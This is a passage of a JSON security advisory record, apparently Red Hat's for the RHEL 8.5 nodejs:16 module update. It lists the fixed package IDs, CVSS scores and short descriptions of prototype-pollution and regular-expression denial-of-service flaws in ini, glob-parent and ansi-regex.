"AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-28469", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-04-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1945459" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-glob-parent. The enclosure regex used to check for glob enclosures containing backslashes is vulnerable to Regular Expression Denial of Service attacks. This flaw allows an attacker to cause a denial of service if they can supply a malicious string to the glob-parent function. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-glob-parent: Regular expression denial of service", "title": "Vulnerability summary" }, { "category": "other", "text": "While some components do package a vulnerable version of glob-parent, access to them requires OpenShift OAuth credentials and hence have been marked with a Low impact. This applies to the following products:\n - OpenShift Container Platform (OCP)\n - OpenShift ServiceMesh (OSSM)\n - Red Hat Advanced Cluster Management for Kubernetes (RHACM)\n - OpenShift distributed tracing", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-28469" }, { "category": "external", "summary": "RHBZ#1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-28469", "url": "https://www.cve.org/CVERecord?id=CVE-2020-28469" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905", "url": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905" } ], "release_date": "2021-01-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T17:21:31+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5171" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-glob-parent: Regular expression denial of service" }, { "cve": "CVE-2021-3807", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-17T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2007557" } ], "notes": [ { "category": "description", "text": "A regular expression denial of service (ReDoS) vulnerability was found in nodejs-ansi-regex. This could possibly cause an application using ansi-regex to use an excessive amount of CPU time when matching crafted ANSI escape codes.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw requires crafted invalid ANSI escape codes in order to be exploited and only allows for denial of service of applications on the client side, hence the impact has been rated as Moderate.\n\nIn Red Hat Virtualization and Red Hat Quay some components use a vulnerable version of ansi-regex. However, all frontend code is executed on the client side. As the maximum impact of this vulnerability is denial of service in the client, the vulnerability is rated Moderate for those products.\n\nOpenShift Container Platform 4 (OCP) ships affected version of ansi-regex in the ose-metering-hadoop container, however the metering operator is deprecated since 4.6[1]. This issue is not currently planned to be addressed in future updates and hence hadoop container has been marked as \u0027will not fix\u0027.\n\nAdvanced Cluster Management for Kubernetes (RHACM) ships the affected version of ansi-regex in several containers, however the impact of this vulnerability is deemed low as it would result in an authenticated slowing down their own user interface. \n\n[1] https://docs.openshift.com/container-platform/4.6/metering/metering-about-metering.html", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src" ], "known_not_affected": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", 